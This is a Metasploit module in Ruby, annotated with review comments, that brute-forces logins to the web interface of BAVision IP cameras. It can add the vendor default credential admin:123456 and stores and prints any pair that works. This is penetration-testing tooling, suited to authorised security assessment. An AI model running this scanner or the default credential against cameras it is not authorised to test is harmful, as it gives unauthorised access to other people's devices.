Path: blob/master/modules/auxiliary/scanner/http/bavision_cam_login.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'metasploit/framework/login_scanner/bavision_cameras'
require 'metasploit/framework/credential_collection'

# Auxiliary login scanner for the web interface of BAVision IP cameras.
#
# The module builds a credential collection from the datastore, hands it to
# Metasploit::Framework::LoginScanner::BavisionCameras, and records every
# attempt outcome through the reporting helpers (create_credential,
# create_credential_login, invalidate_login).
#
# Credential handling to be aware of when reviewing output and stored data:
# * a successful pair is interpolated into the console message, so whatever
#   result.credential renders as ends up in console output;
# * the private value is passed to create_credential with
#   private_type :password, i.e. it is recorded as a password, not a hash.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  # Registers the module metadata and the TRYDEFAULT option.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    # NOTE(review): all three 'Notes' entries are UNKNOWN_*, so the metadata
    # says nothing about lockouts or log artifacts. A scanner that submits
    # login attempts will likely leave failed-authentication entries on the
    # target; worth filling these in.
    metadata = update_info(
      info,
      'Name' => 'BAVision IP Camera Web Server Login',
      'Description' => %q{
        This module will attempt to authenticate to an IP camera created by BAVision via the
        web service. By default, the vendor ships a default credential admin:123456 to its
        cameras, and the web server does not enforce lockouts in case of a bruteforce attack.
      },
      'Author' => [ 'sinn3r' ],
      'License' => MSF_LICENSE,
      'Notes' => {
        'Reliability' => UNKNOWN_RELIABILITY,
        'Stability' => UNKNOWN_STABILITY,
        'SideEffects' => UNKNOWN_SIDE_EFFECTS
      }
    )
    super(metadata)

    # TRYDEFAULT is optional and off unless the operator enables it.
    try_default = OptBool.new('TRYDEFAULT', [false, 'Try the default credential admin:123456', false])
    register_options([try_default])
  end

  # Returns the login scanner for this module instance, building it on first use.
  #
  # The scanner is memoized in @scanner regardless of +ip+, so a later call with
  # a different address returns the scanner built for the first one.
  # NOTE(review): presumably safe because the framework runs each host on its
  # own module instance - confirm against Msf::Auxiliary::Scanner.
  #
  # @param ip [String] target address used as the scanner's host
  # @return [Metasploit::Framework::LoginScanner::BavisionCameras]
  def scanner(ip)
    @scanner ||= begin
      creds = build_credential_collection(
        username: datastore['USERNAME'],
        password: datastore['PASSWORD']
      )

      if datastore['TRYDEFAULT']
        # Queue the vendor default pair named in the module description.
        print_status("Default credential admin:123456 added to the credential queue for testing.")
        creds.add_public('admin')
        creds.add_private('123456')
      end

      # connection_timeout is fixed at 5 (unit not visible here; presumably seconds).
      scanner_opts = configure_http_login_scanner(
        host: ip,
        port: datastore['RPORT'],
        cred_details: creds,
        stop_on_success: datastore['STOP_ON_SUCCESS'],
        bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
        connection_timeout: 5,
        http_username: datastore['HttpUsername'],
        http_password: datastore['HttpPassword']
      )

      Metasploit::Framework::LoginScanner::BavisionCameras.new(scanner_opts)
    end
  end

  # Records a working credential and the login it succeeded against.
  #
  # The private value is handed to create_credential as a :password, tied to
  # the http/tcp service at +ip+:+port+ in the current workspace.
  #
  # @param ip [String] address of the service
  # @param port [Integer] port of the service
  # @param result [Object] scan result exposing #credential, #status and #proof
  def report_good_cred(ip, port, result)
    service = {
      address: ip,
      port: port,
      service_name: 'http',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    core_attrs = {
      module_fullname: fullname,
      origin_type: :service,
      private_data: result.credential.private,
      private_type: :password,
      username: result.credential.public,
      **service
    }

    login_attrs = {
      core: create_credential(core_attrs),
      last_attempted_at: DateTime.now,
      status: result.status,
      proof: result.proof,
      **service
    }

    create_credential_login(login_attrs)
  end

  # Marks a credential as not valid for the service via invalidate_login.
  #
  # @param ip [String] address of the service
  # @param rport [Integer] port of the service (shadows the rport helper here)
  # @param result [Object] scan result exposing #credential, #status and #proof
  def report_bad_cred(ip, rport, result)
    tried = result.credential

    invalidate_login(
      address: ip,
      port: rport,
      protocol: 'tcp',
      public: tried.public,
      private: tried.private,
      realm_key: tried.realm_key,
      realm_value: tried.realm,
      status: result.status,
      proof: result.proof
    )
  end

  # Runs the login scan against +ip+ and reports each result.
  #
  # Only SUCCESSFUL, UNABLE_TO_CONNECT and INCORRECT are handled; any other
  # status falls through the case with no message and no report.
  #
  # @param ip [String] target address
  def bruteforce(ip)
    login_status = Metasploit::Model::Login::Status

    scanner(ip).scan! do |result|
      case result.status
      when login_status::SUCCESSFUL
        # The credential itself is part of the message shown to the operator.
        print_brute(level: :good, ip: ip, msg: "Success: '#{result.credential}'")
        report_good_cred(ip, rport, result)
      when login_status::UNABLE_TO_CONNECT
        vprint_brute(level: :verror, ip: ip, msg: result.proof)
        report_bad_cred(ip, rport, result)
      when login_status::INCORRECT
        vprint_brute(level: :verror, ip: ip, msg: "Failed: '#{result.credential}'")
        report_bad_cred(ip, rport, result)
      end
    end
  end

  # Per-host entry point: scans only when the scanner's check_setup passes.
  #
  # @param ip [String] target address
  def run_host(ip)
    return bruteforce(ip) if scanner(ip).check_setup

    # No login attempt is made against a host that fails the setup check.
    print_brute(level: :error, ip: ip, msg: 'Target is not BAVision IP camera web server.')
    nil
  end
end